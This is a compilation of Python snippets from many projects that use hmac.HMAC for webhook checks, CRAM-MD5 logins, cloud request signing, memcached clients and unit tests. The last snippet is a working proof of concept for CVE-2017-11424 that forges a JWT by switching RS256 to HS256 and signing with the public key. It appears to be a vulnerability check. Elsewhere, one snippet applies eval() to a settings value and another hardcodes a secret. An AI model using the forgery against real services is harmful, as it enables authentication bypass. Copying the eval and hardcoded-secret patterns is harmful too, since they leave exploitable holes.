def test_with_str_key(self): # Pass a key of type str, which is an error, because it expects a key # of type bytes with self.assertRaises(TypeError): h = hmac.HMAC("key")
def make_signature(body): hmac_instance = hmac.HMAC(WEBHOOK_SECRET, body, hashlib.sha1) return 'sha1=' + hmac_instance.hexdigest()
def __str__(self): #print repr(s) #print self.s return hmac.HMAC(self.secret, self.s, hashlib.md5).hexdigest()
def getANewSessionId(): return str( hmac.HMAC(key=str(uuid.uuid4()), digestmod=hashlib.sha1).hexdigest())
def create_reader(self, stored_blob, secret_key, hashfunc): return lambda: _HMACFileReader(hmac.HMAC(secret_key, None, hashfunc), BytesIO(stored_blob))
def createHMAC(k, digestmod=hashlib.sha1): return hmac.HMAC(k, digestmod=digestmod)
def _hmac_sha256(key, msg): h = hmac.HMAC(key, digestmod=hashlib.sha256) h.update(msg) return h.digest()
def _CRAM_MD5_AUTH(self, challenge): """ Authobject to use with CRAM-MD5 authentication. """ import hmac return self.user + " " + hmac.HMAC(self.password, challenge).hexdigest()
def generate_signature(uri, key, expiry_time): message = (uri + "\n" + str(expiry_time)).encode("utf-8") signing_key = base64.b64decode(key.encode("utf-8")) signed_hmac = hmac.HMAC(signing_key, message, hashlib.sha256) signature = urllib.parse.quote(base64.b64encode(signed_hmac.digest())) return signature
def HMAC(self, key, msg): return hmac.HMAC(key=key, msg=msg, digestmod=self.hash).digest()
def MAC(self, key, seq, msg): mac = hmac.HMAC(key=key, digestmod=self.hash) seqnum = num_to_bytes(seq) mac.update(seqnum) mac.update(msg) return mac.digest()[:10] + b'\x00\x01' + seqnum
def test_default_is_md5(self): # Testing if HMAC defaults to MD5 algorithm. # NOTE: this whitebox test depends on the hmac class internals h = hmac.HMAC(b"key") self.assertEqual(h.digest_cons, hashlib.md5)
def test_withmodule(self): # Constructor call with text and digest module. try: h = hmac.HMAC(b"key", b"", hashlib.sha1) except Exception: self.fail("Constructor call with hashlib.sha1 raised exception.")
def test_with_memoryview_msg(self): try: h = hmac.HMAC(b"key", memoryview(b"hash this!"), digestmod="md5") except Exception: self.fail("Constructor call with memoryview msg raised exception.") self.assertEqual(h.hexdigest(), '34325b639da4cfd95735b381e28cb864')
def encode_cram_md5(challenge, user, password): challenge = base64.decodebytes(challenge) response = user + ' ' + hmac.HMAC(password.encode('ascii'), challenge).hexdigest() return encode_base64(response.encode('ascii'), eol='')
from __future__ import print_function import json import hashlib import hmac import os import sys # Modify these for your installation. SECRET = "iamasecret" CONTROL = "/home/rekalltest/control" data = sys.stdin.read() print("""Content-type: text/html <html><h1> """) # Verify the hmac. hmac_sig = hmac.HMAC(SECRET, data, hashlib.sha1).hexdigest() if hmac_sig != os.environ['HTTP_X_HUB_SIGNATURE'].split("=")[1]: print("Denied") else: # Create the control file to kick off the test run. print("Scheduling run.") data = json.loads(data) data["action"] = "start" with open(CONTROL, "wb") as fd: fd.write(json.dumps(data))
def publish(self, args): """ #** #* Publish #* #* Send a message to a channel. #* #* @param array args with channel and message. #* @return array success information. #** ## Publish Example def publish_complete(info): print(info) pubnub.publish({ 'channel' : 'hello_world', 'message' : { 'some_text' : 'Hello my World' }, 'callback' : publish_complete }) """ ## Fail if bad input. if not (args['channel'] and args['message']): print('Missing Channel or Message') return False ## Capture User Input channel = str(args['channel']) message = args['message'] if self.cipher_key: pc = PubnubCrypto() out = [] if type(message) == type(list()): for item in message: encryptItem = pc.encrypt(self.cipher_key, item).rstrip() out.append(encryptItem) message = json.dumps(out) elif type(message) == type(dict()): outdict = {} for k, item in message.iteritems(): encryptItem = pc.encrypt(self.cipher_key, item).rstrip() outdict[k] = encryptItem out.append(outdict) message = json.dumps(out[0]) else: message = json.dumps( pc.encrypt(self.cipher_key, message).replace('\n', '')) else: message = json.dumps(args['message']) ## Capture Callback if args.has_key('callback'): callback = args['callback'] else: callback = lambda x: x ## Sign Message if self.secret_key: hashObject = sha256() hashObject.update(self.secret_key) hashedSecret = hashObject.hexdigest() hash = hmac.HMAC(hashedSecret, '/'.join([ self.publish_key, self.subscribe_key, self.secret_key, channel, message ]), digestmod=digestmod) signature = hash.hexdigest() else: signature = '0' ## Send Message return self._request([ 'publish', self.publish_key, self.subscribe_key, signature, channel, '0', message ], callback)
def blob(self, method, account, path, body=None, headers=None, tag=None): debug('blob: %s %s %s %s %s\n' % (method, account, path, repr(body[:1024]) if isinstance( body, basestring) else str(body), headers)) headers_dict = {} if headers is not None: for h in headers: name, val = h.split(':', 1) name = name.strip().lower() val = val.strip() headers_dict[name] = val if body and 'content-type' not in headers_dict: headers_dict['content-type'] = 'application/octet-stream' md5 = hashlib.md5() md5.update(body) headers_dict['content-md5'] = base64.b64encode(md5.digest()) date = time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime()) headers_dict['x-ms-date'] = date if 'x-ms-version' not in headers_dict: headers_dict['x-ms-version'] = '2015-04-05' if account is None: m = re.match( r'https?://([^\.]+)\.blob\.%s(.*)$' % self.environment.core.replace('.', '\\.'), path) if m: account = m.group(1) path = m.group(2) markers = [] result = [] while True: marker_path = path if markers: marker_path += '&marker=' + markers[0] path_for_sig, sep, query = marker_path.partition('?') if query: params = {} for p in query.split('&'): n, v = p.split('=', 1) v = urllib2.unquote(v) if '\n' in v or ',' in v: raise Exception('cannot sign url with "\\n" or ","') if n not in params: params[n] = [] params[n].append(v) for n in sorted(params): path_for_sig += ('\n' + urllib2.unquote(n) + ':' + ','.join(params[n])) data = ( method + '\n' + headers_dict.get('content-encoding', '') + '\n' + headers_dict.get('content-language', '') + '\n' + (str(len(body)) if body else '') + '\n' + # content-length headers_dict.get('content-md5', '') + '\n' + headers_dict.get('content-type', '') + '\n' + headers_dict.get('date', '') + '\n' + headers_dict.get('if-modified-since', '') + '\n' + headers_dict.get('if-match', '') + '\n' + headers_dict.get('if-none-match', '') + '\n' + headers_dict.get('if-unmodified-since', '') + '\n' + headers_dict.get('range', '') + '\n') for h in sorted(headers_dict): if h.startswith('x-ms'): data += h + ':' + headers_dict[h] + '\n' account, key = self.account_key(account) data += '/' + account + path_for_sig sig = base64.b64encode( hmac.HMAC(base64.b64decode(key), data, hashlib.sha256).digest()) headers_dict['authorization'] = 'SharedKey ' + account + ':' + sig headers = ['%s: %s' % (n, headers_dict[n]) for n in headers_dict] h, b = request(method, 'https://' + account + '.blob.' + self.environment.core + marker_path, body=body, headers=headers, pool=self.pool, max_time=self.max_time) if not tag: return h, b result += [e for e in b.getElementsByTagName(tag)] markers = values(b, 'NextMarker') if not markers: break b = xml.dom.minidom.parseString('<' + tag + 's/>') for e in result: b.documentElement.appendChild(e) return {}, b
class MemcachedClient(object): """Simple memcached client.""" vbucketId = 0 def __init__(self, host='127.0.0.1', port=11211, family=socket.AF_INET): self.host = host self.port = port self.s = socket.socket(family, socket.SOCK_STREAM) if hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX: self.s.connect_ex(host) else: self.s.connect_ex((host, port)) self.r = random.Random() def close(self): self.s.close() def __del__(self): self.close() def _sendCmd(self, cmd, key, val, opaque, extraHeader='', cas=0): self._sendMsg(cmd, key, val, opaque, extraHeader=extraHeader, cas=cas, vbucketId=self.vbucketId) def _sendMsg(self, cmd, key, val, opaque, extraHeader='', cas=0, dtype=0, vbucketId=0, fmt=REQ_PKT_FMT, magic=REQ_MAGIC_BYTE): msg = struct.pack(fmt, magic, cmd, len(key), len(extraHeader), dtype, vbucketId, len(key) + len(extraHeader) + len(val), opaque, cas) self.s.send(msg + extraHeader + key + val) def _recvMsg(self): response = "" while len(response) < MIN_RECV_PACKET: data = self.s.recv(MIN_RECV_PACKET - len(response)) if data == '': raise exceptions.EOFError("Got empty data (remote died?).") response += data assert len(response) == MIN_RECV_PACKET magic, cmd, keylen, extralen, dtype, errcode, remaining, opaque, cas=\ struct.unpack(RES_PKT_FMT, response) rv = "" while remaining > 0: data = self.s.recv(remaining) if data == '': raise exceptions.EOFError("Got empty data (remote died?).") rv += data remaining -= len(data) assert (magic in (RES_MAGIC_BYTE, REQ_MAGIC_BYTE)), "Got magic: %d" % magic return cmd, errcode, opaque, cas, keylen, extralen, rv def _handleKeyedResponse(self, myopaque): cmd, errcode, opaque, cas, keylen, extralen, rv = self._recvMsg() assert myopaque is None or opaque == myopaque, \ "expected opaque %x, got %x" % (myopaque, opaque) if errcode != 0: raise MemcachedError(errcode, rv) return cmd, opaque, cas, keylen, extralen, rv def _handleSingleResponse(self, myopaque): cmd, opaque, cas, keylen, extralen, data = self._handleKeyedResponse( myopaque) return opaque, cas, data def _doCmd(self, cmd, key, val, extraHeader='', cas=0): """Send a command and await its response.""" opaque = self.r.randint(0, 2**32) self._sendCmd(cmd, key, val, opaque, extraHeader, cas) return self._handleSingleResponse(opaque) def _mutate(self, cmd, key, exp, flags, cas, val): return self._doCmd(cmd, key, val, struct.pack(SET_PKT_FMT, flags, exp), cas) def _cat(self, cmd, key, cas, val): return self._doCmd(cmd, key, val, '', cas) def append(self, key, value, cas=0): return self._cat(memcacheConstants.CMD_APPEND, key, cas, value) def prepend(self, key, value, cas=0): return self._cat(memcacheConstants.CMD_PREPEND, key, cas, value) def __incrdecr(self, cmd, key, amt, init, exp): something, cas, val = self._doCmd( cmd, key, '', struct.pack(memcacheConstants.INCRDECR_PKT_FMT, amt, init, exp)) return struct.unpack(INCRDECR_RES_FMT, val)[0], cas def incr(self, key, amt=1, init=0, exp=0): """Increment or create the named counter.""" return self.__incrdecr(memcacheConstants.CMD_INCR, key, amt, init, exp) def decr(self, key, amt=1, init=0, exp=0): """Decrement or create the named counter.""" return self.__incrdecr(memcacheConstants.CMD_DECR, key, amt, init, exp) def _doMetaCmd(self, cmd, key, value, cas, exp, flags, seqno, remote_cas): extra = struct.pack('>IIQQ', flags, exp, seqno, remote_cas) return self._doCmd(cmd, key, value, extra, cas) def _doRevCmd(self, cmd, key, exp, flags, value, rev, cas=0): seqno, revid = rev meta_data = struct.pack('>I', seqno) + revid meta_type = memcacheConstants.META_REVID meta = (meta_type, meta_data) return self._doMetaCmd(cmd, key, exp, flags, value, meta, cas) def set(self, key, exp, flags, val): """Set a value in the memcached server.""" return self._mutate(memcacheConstants.CMD_SET, key, exp, flags, 0, val) def setWithMeta(self, key, value, exp, flags, seqno, remote_cas): """Set a value and its meta data in the memcached server.""" return self._doMetaCmd(memcacheConstants.CMD_SET_WITH_META, key, value, 0, exp, flags, seqno, remote_cas) def setWithRev(self, key, exp, flags, value, rev): """Set a value and its revision in the memcached server.""" return self._doRevCmd(memcacheConstants.CMD_SET_WITH_META, key, exp, flags, value, rev) def add(self, key, exp, flags, val): """Add a value in the memcached server iff it doesn't already exist.""" return self._mutate(memcacheConstants.CMD_ADD, key, exp, flags, 0, val) def addWithMeta(self, key, value, exp, flags, seqno, remote_cas): return self._doMetaCmd(memcacheConstants.CMD_ADD_WITH_META, key, value, 0, exp, flags, seqno, remote_cas) def addWithRev(self, key, exp, flags, value, rev): return self._doRevCmd(memcacheConstants.CMD_ADD_WITH_META, key, exp, flags, value, rev) def replace(self, key, exp, flags, val): """Replace a value in the memcached server iff it already exists.""" return self._mutate(memcacheConstants.CMD_REPLACE, key, exp, flags, 0, val) def observe(self, key, vbucket): """Observe a key for persistence and replication.""" value = struct.pack('>HH', vbucket, len(key)) + key opaque, cas, data = self._doCmd(memcacheConstants.CMD_OBSERVE, '', value) rep_time = (cas & 0xFFFFFFFF) persist_time = (cas >> 32) & 0xFFFFFFFF persisted = struct.unpack('>B', data[4 + len(key)])[0] return opaque, rep_time, persist_time, persisted def __parseGet(self, data, klen=0): flags = struct.unpack(memcacheConstants.GET_RES_FMT, data[-1][:4])[0] return flags, data[1], data[-1][4 + klen:] def get(self, key): """Get the value for a given key within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET, key, '') return self.__parseGet(parts) def __parseMeta(self, data): flags = struct.unpack('I', data[-1][0:4])[0] meta_type = struct.unpack('B', data[-1][4])[0] length = struct.unpack('B', data[-1][5])[0] meta = data[-1][6:6 + length] return (meta_type, flags, meta) def getMeta(self, key): """Get the metadata for a given key within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET_META, key, '') return self.__parseMeta(parts) def getRev(self, key): """Get the revision for a given key within the memcached server.""" (meta_type, flags, meta_data) = self.getMeta(key) if meta_type != memcacheConstants.META_REVID: raise ValueError("Invalid meta type %x" % meta_type) seqno = struct.unpack('>Q', meta_data[:8])[0] revid = meta_data[4:] return (seqno, revid) def getl(self, key, exp=15): """Get the value for a given key within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET_LOCKED, key, '', struct.pack(memcacheConstants.GETL_PKT_FMT, exp)) return self.__parseGet(parts) def cas(self, key, exp, flags, oldVal, val): """CAS in a new value for the given key and comparison value.""" self._mutate(memcacheConstants.CMD_SET, key, exp, flags, oldVal, val) def touch(self, key, exp): """Touch a key in the memcached server.""" return self._doCmd(memcacheConstants.CMD_TOUCH, key, '', struct.pack(memcacheConstants.TOUCH_PKT_FMT, exp)) def gat(self, key, exp): """Get the value for a given key and touch it within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GAT, key, '', struct.pack(memcacheConstants.GAT_PKT_FMT, exp)) return self.__parseGet(parts) def getr(self, key): """Get the value for a given key in a replica vbucket within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET_REPLICA, key, '') return self.__parseGet(parts, len(key)) def version(self): """Get the value for a given key within the memcached server.""" return self._doCmd(memcacheConstants.CMD_VERSION, '', '') def verbose(self, level): """Set the verbosity level.""" return self._doCmd(memcacheConstants.CMD_VERBOSE, '', '', extraHeader=struct.pack(">I", level)) def sasl_mechanisms(self): """Get the supported SASL methods.""" return set( self._doCmd(memcacheConstants.CMD_SASL_LIST_MECHS, '', '')[2].split(' ')) def sasl_auth_start(self, mech, data): """Start a sasl auth session.""" return self._doCmd(memcacheConstants.CMD_SASL_AUTH, mech, data) def sasl_auth_plain(self, user, password, foruser=''): """Perform plain auth.""" return self.sasl_auth_start('PLAIN', '\0'.join([foruser, user, password])) def sasl_auth_cram_md5(self, user, password): """Start a plan auth session.""" try: self.sasl_auth_start('CRAM-MD5', '') except MemcachedError, e: if e.status != memcacheConstants.ERR_AUTH_CONTINUE: raise challenge = e.msg dig = hmac.HMAC(password, challenge).hexdigest() return self._doCmd(memcacheConstants.CMD_SASL_STEP, 'CRAM-MD5', user + ' ' + dig)
def sasl_auth_plain(self, user, password, foruser=''): """Perform plain auth.""" return self.sasl_auth_start('PLAIN', '\0'.join([foruser, user, password])) def sasl_auth_cram_md5(self, user, password): """Start a plan auth session.""" try: self.sasl_auth_start('CRAM-MD5', '') except MemcachedError, e: if e.status != memcacheConstants.ERR_AUTH_CONTINUE: raise challenge = e.msg dig = hmac.HMAC(password, challenge).hexdigest() return self._doCmd(memcacheConstants.CMD_SASL_STEP, 'CRAM-MD5', user + ' ' + dig) def stop_persistence(self): return self._doCmd(memcacheConstants.CMD_STOP_PERSISTENCE, '', '') def start_persistence(self): return self._doCmd(memcacheConstants.CMD_START_PERSISTENCE, '', '') def set_flush_param(self, key, val): print "setting flush param:", key, val return self._doCmd(memcacheConstants.CMD_SET_FLUSH_PARAM, key, val) def stop_replication(self): return self._doCmd(memcacheConstants.CMD_STOP_REPLICATION, '', '')
def checkPassword(self, password): verify = hexlify(hmac.HMAC(password, self.challenge).digest()) return verify == self.response
def _new_auth(self): if self.key: self.auth = hmac.HMAC(self.key, digestmod=self.digest_mod) else: self.auth = None
def expected_digest(self, secret_key, value, hashfunc): return hmac.HMAC(secret_key, value, hashfunc).digest()
def create_sig_from_msg(key, msg): sig = hmac.HMAC(key.encode(), msg.encode(), "sha256").digest() sig = base64.b64encode(sig) return sig
def test_input_too_short(self, secret_key, hashfunc): with pytest.raises(VerificationException): _HMACFileReader(hmac.HMAC(secret_key, None, hashfunc), BytesIO(b"a"))
def disqus_sso(context): """ Return the HTML/js code to enable DISQUS SSO - so logged in users on your site can be logged in to disqus seemlessly. """ DISQUS_SECRET_KEY = getattr(settings, 'DISQUS_SECRET_KEY', None) if DISQUS_SECRET_KEY is None: return "<p>You need to set DISQUS_SECRET_KEY before you can use SSO</p>" DISQUS_PUBLIC_KEY = getattr(settings, 'DISQUS_PUBLIC_KEY', None) if DISQUS_PUBLIC_KEY is None: return "<p>You need to set DISQUS_PUBLIC_KEY before you can use SSO</p>" SSO_AVATAR = getattr(settings, 'SSO_AVATAR', None) SSO_NAME = getattr(settings, 'SSO_NAME', None) SSO_BUTTON = getattr(settings, 'SSO_BUTTON', None) SSO_ICON = getattr(settings, 'SSO_ICON', None) SSO_URL = getattr(settings, 'SSO_URL', None) SSO_LOGOUT = getattr(settings, 'SSO_LOGOUT', None) SSO_WIDTH = getattr(settings, 'SSO_WIDTH', None) SSO_HEIGHT = getattr(settings, 'SSO_HEIGHT', None) user = context['user'] if user.is_authenticated(): # create a JSON packet of our data attributes data = json.dumps({ 'id': user.id, 'username': user.username, 'email': user.email, 'avatar': eval(SSO_AVATAR), }) # encode the data to base64 message = base64.b64encode(data.encode('utf-8')).decode() else: message = None # generate a timestamp for signing the message timestamp = int(time.time()) key = DISQUS_SECRET_KEY.encode('utf-8') msg = ('%s %s' % (message, timestamp)).encode('utf-8') digestmod = hashlib.sha1 # generate our hmac signature sig = hmac.HMAC(key, msg, digestmod).hexdigest() return dict( message = message, timestamp = timestamp, sig = sig, pub_key = DISQUS_PUBLIC_KEY, SSO_NAME = SSO_NAME, SSO_BUTTON = SSO_BUTTON, SSO_ICON = SSO_ICON, SSO_URL = SSO_URL, SSO_LOGOUT = SSO_LOGOUT, SSO_WIDTH = SSO_WIDTH, SSO_HEIGHT = SSO_HEIGHT, )
def encode_cram_md5(challenge, user, password): challenge = base64.decodestring(challenge) response = user + " " + hmac.HMAC(password, challenge).hexdigest() return encode_base64(response, eol="")
class MemcachedClient(object): """Simple memcached client.""" vbucketId = 0 def __init__(self, host='127.0.0.1', port=11211, family=socket.AF_UNSPEC): self.host = host self.port = port # Iterate all addresses for the given family; using the first # one we can successfully connect to. If none succeed raise # the last attempted as an exception. for info in socket.getaddrinfo(self.host, self.port, family, socket.SOCK_STREAM): _family, socktype, proto, _, sockaddr = info try: sock = socket.socket(_family, socktype, proto) sock.settimeout(10) sock.connect(sockaddr) self.s = sock break except socket.error as sock_error: # If we get here socket objects will be close()d via # garbage collection. pass else: # Didn't break from the loop, re-raise the last error raise sock_error self.s.setblocking(0) self.r = random.Random() self.req_features = set() self.features = set() self.error_map = None self.error_map_version = 1 self.collection_map = {} self.log = logger.Logger.get_logger() def close(self): self.s.close() def __del__(self): self.close() def _sendCmd(self, cmd, key, val, opaque, extraHeader='', cas=0, collection=None): self._sendMsg(cmd, key, val, opaque, extraHeader=extraHeader, cas=cas, vbucketId=self.vbucketId, collection=collection) def _sendMsg(self, cmd, key, val, opaque, extraHeader='', cas=0, dtype=0, vbucketId=0, fmt=REQ_PKT_FMT, magic=REQ_MAGIC_BYTE, collection=None): if collection: key = self._encodeCollectionId(key, collection) msg = struct.pack(fmt, magic, cmd, len(key), len(extraHeader), dtype, vbucketId, len(key) + len(extraHeader) + len(val), opaque, cas) self.s.sendall(msg + extraHeader + key + val) def _socketRecv(self, amount): ready = select.select([self.s], [], [], 30) if ready[0]: return self.s.recv(amount) raise TimeoutError(30) def _recvMsg(self): response = "" while len(response) < MIN_RECV_PACKET: data = self._socketRecv(MIN_RECV_PACKET - len(response)) if data == '': raise exceptions.EOFError("Got empty data (remote died?).") response += data assert len(response) == MIN_RECV_PACKET magic, cmd, keylen, extralen, dtype, errcode, remaining, opaque, cas=\ struct.unpack(RES_PKT_FMT, response) rv = "" while remaining > 0: data = self._socketRecv(remaining) if data == '': raise exceptions.EOFError("Got empty data (remote died?).") rv += data remaining -= len(data) assert (magic in (RES_MAGIC_BYTE, REQ_MAGIC_BYTE)), "Got magic: %d" % magic return cmd, errcode, opaque, cas, keylen, extralen, rv def _handleKeyedResponse(self, myopaque): cmd, errcode, opaque, cas, keylen, extralen, rv = self._recvMsg() assert myopaque is None or opaque == myopaque, \ "expected opaque %x, got %x" % (myopaque, opaque) if errcode != 0: if self.error_map is None: msg = rv else: err = self.error_map['errors'].get(errcode, rv) msg = "{name} : {desc} : {rv}".format(rv=rv, **err) raise MemcachedError(errcode, msg) return cmd, opaque, cas, keylen, extralen, rv def _handleSingleResponse(self, myopaque): cmd, opaque, cas, keylen, extralen, data = self._handleKeyedResponse( myopaque) return opaque, cas, data def _doCmd(self, cmd, key, val, extraHeader='', cas=0, collection=None): """Send a command and await its response.""" opaque = self.r.randint(0, 2**32) self._sendCmd(cmd, key, val, opaque, extraHeader, cas, collection) return self._handleSingleResponse(opaque) def _mutate(self, cmd, key, exp, flags, cas, val, collection): return self._doCmd(cmd, key, val, struct.pack(SET_PKT_FMT, flags, exp), cas, collection) def _cat(self, cmd, key, cas, val, collection): return self._doCmd(cmd, key, val, '', cas, collection) def hello(self, name): resp = self._doCmd( memcacheConstants.CMD_HELLO, name, struct.pack('>' + 'H' * len(self.req_features), *self.req_features)) supported = resp[2] for i in range(0, len(supported), struct.calcsize(">H")): self.features.update(struct.unpack_from(">H", supported, i)) if self.is_xerror_supported(): self.error_map = self.get_error_map() return resp def append(self, key, value, cas=0, collection=None): return self._cat(memcacheConstants.CMD_APPEND, key, cas, value, collection) def prepend(self, key, value, cas=0, collection=None): return self._cat(memcacheConstants.CMD_PREPEND, key, cas, value, collection) def __incrdecr(self, cmd, key, amt, init, exp, collection): something, cas, val = self._doCmd( cmd, key, '', struct.pack(memcacheConstants.INCRDECR_PKT_FMT, amt, init, exp), collection=collection) return struct.unpack(INCRDECR_RES_FMT, val)[0], cas def incr(self, key, amt=1, init=0, exp=0, collection=None): """Increment or create the named counter.""" return self.__incrdecr(memcacheConstants.CMD_INCR, key, amt, init, exp, collection) def decr(self, key, amt=1, init=0, exp=0, collection=None): """Decrement or create the named counter.""" return self.__incrdecr(memcacheConstants.CMD_DECR, key, amt, init, exp, collection) def _doMetaCmd(self, cmd, key, value, cas, exp, flags, seqno, remote_cas): extra = struct.pack('>IIQQ', flags, exp, seqno, remote_cas) return self._doCmd(cmd, key, value, extra, cas) def set(self, key, exp, flags, val, collection=None): """Set a value in the memcached server.""" return self._mutate(memcacheConstants.CMD_SET, key, exp, flags, 0, val, collection) def setWithMeta(self, key, value, exp, flags, seqno, remote_cas): """Set a value and its meta data in the memcached server.""" return self._doMetaCmd(memcacheConstants.CMD_SET_WITH_META, key, value, 0, exp, flags, seqno, remote_cas) def delWithMeta(self, key, exp, flags, seqno, remote_cas, collection=None): return self._doMetaCmd(memcacheConstants.CMD_DELETE_WITH_META, key, '', 0, exp, flags, seqno, remote_cas, collection) def add(self, key, exp, flags, val, collection=None): """Add a value in the memcached server iff it doesn't already exist.""" return self._mutate(memcacheConstants.CMD_ADD, key, exp, flags, 0, val, collection) def addWithMeta(self, key, value, exp, flags, seqno, remote_cas, collection=None): return self._doMetaCmd(memcacheConstants.CMD_ADD_WITH_META, key, value, 0, exp, flags, seqno, remote_cas, collection) def replace(self, key, exp, flags, val, collection=None): """Replace a value in the memcached server iff it already exists.""" return self._mutate(memcacheConstants.CMD_REPLACE, key, exp, flags, 0, val, collection) def observe(self, key, vbucket, collection=None): """Observe a key for persistence and replication.""" value = struct.pack('>HH', vbucket, len(key)) + key opaque, cas, data = self._doCmd(memcacheConstants.CMD_OBSERVE, '', value, collection=collection) rep_time = (cas & 0xFFFFFFFF) persist_time = (cas >> 32) & 0xFFFFFFFF persisted = struct.unpack('>B', data[4 + len(key)])[0] return opaque, rep_time, persist_time, persisted def __parseGet(self, data, klen=0): flags = struct.unpack(memcacheConstants.GET_RES_FMT, data[-1][:4])[0] return flags, data[1], data[-1][4 + klen:] def get(self, key, collection=None): """Get the value for a given key within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET, key, '', collection=collection) return self.__parseGet(parts) def getMeta(self, key, collection=None): """Get the metadata for a given key within the memcached server.""" opaque, cas, data = self._doCmd(memcacheConstants.CMD_GET_META, key, '', collection=collection) deleted = struct.unpack('>I', data[0:4])[0] flags = struct.unpack('>I', data[4:8])[0] exp = struct.unpack('>I', data[8:12])[0] seqno = struct.unpack('>Q', data[12:20])[0] return (deleted, flags, exp, seqno, cas) def getl(self, key, exp=15, collection=None): """Get the value for a given key within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET_LOCKED, key, '', struct.pack(memcacheConstants.GETL_PKT_FMT, exp), collection=collection) return self.__parseGet(parts) def cas(self, key, exp, flags, oldVal, val, collection=None): """CAS in a new value for the given key and comparison value.""" self._mutate(memcacheConstants.CMD_SET, key, exp, flags, oldVal, val, collection) def touch(self, key, exp, collection=None): """Touch a key in the memcached server.""" return self._doCmd(memcacheConstants.CMD_TOUCH, key, '', struct.pack(memcacheConstants.TOUCH_PKT_FMT, exp), collection=collection) def gat(self, key, exp, collection=None): """Get the value for a given key and touch it within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GAT, key, '', struct.pack(memcacheConstants.GAT_PKT_FMT, exp), collection=collection) return self.__parseGet(parts) def getr(self, key, collection=None): """Get the value for a given key in a replica vbucket within the memcached server.""" parts = self._doCmd(memcacheConstants.CMD_GET_REPLICA, key, '', collection=collection) return self.__parseGet(parts, len(key)) def version(self): """Get the value for a given key within the memcached server.""" return self._doCmd(memcacheConstants.CMD_VERSION, '', '') def verbose(self, level): """Set the verbosity level.""" return self._doCmd(memcacheConstants.CMD_VERBOSE, '', '', extraHeader=struct.pack(">I", level)) def sasl_mechanisms(self): """Get the supported SASL methods.""" return set( self._doCmd(memcacheConstants.CMD_SASL_LIST_MECHS, '', '')[2].split(' ')) def sasl_auth_start(self, mech, data): """Start a sasl auth session.""" return self._doCmd(memcacheConstants.CMD_SASL_AUTH, mech, data) def sasl_auth_plain(self, user, password, foruser=''): """Perform plain auth.""" return self.sasl_auth_start('PLAIN', '\0'.join([foruser, user, password])) def sasl_auth_cram_md5(self, user, password): """Start a plan auth session.""" try: self.sasl_auth_start('CRAM-MD5', '') except MemcachedError, e: if e.status != memcacheConstants.ERR_AUTH_CONTINUE: raise challenge = e.msg dig = hmac.HMAC(password, challenge).hexdigest() return self._doCmd(memcacheConstants.CMD_SASL_STEP, 'CRAM-MD5', user + ' ' + dig)
def sign_string(s, key, algo="sha256", timedelta=30): digestmod = getattr(hashlib, algo) hash = hmac.HMAC(bytes(key,"utf-8"), digestmod=digestmod, msg=bytes(s,"utf-8")) return hash.digest()
print("Testing CVE-2017-11424") private_key = open("standard.pem", "r").read() public_key = open("standard.pub.pem", "r").read() cve_exp = int(time.time()) + 86400 cve = jwt.encode( { "iss": "joe", "exp": cve_exp, "http://example.com/is_root": True }, private_key, algorithm="RS256") jwt.decode(cve, public_key, algorithm="RS256") cve_parts = cve.split(b'.') print(cve) cve_msg = b'.'.join(cve_parts[0:2]) alg = b64urldecode(cve_parts[0].decode('utf8')) alg_tampered = b64urlencode(alg.replace(b"RS256", b"HS256")) tamper_hmac = b64urlencode( hmac.HMAC(public_key.encode('ascii'), b'.'.join([alg_tampered, cve_parts[1]]), hashlib.sha256).digest()) cve_tampered = b'.'.join([alg_tampered, cve_parts[1], tamper_hmac]) print(cve_tampered) jwt.decode(cve_tampered, public_key) print("\nUsing a vulnerable library, good.")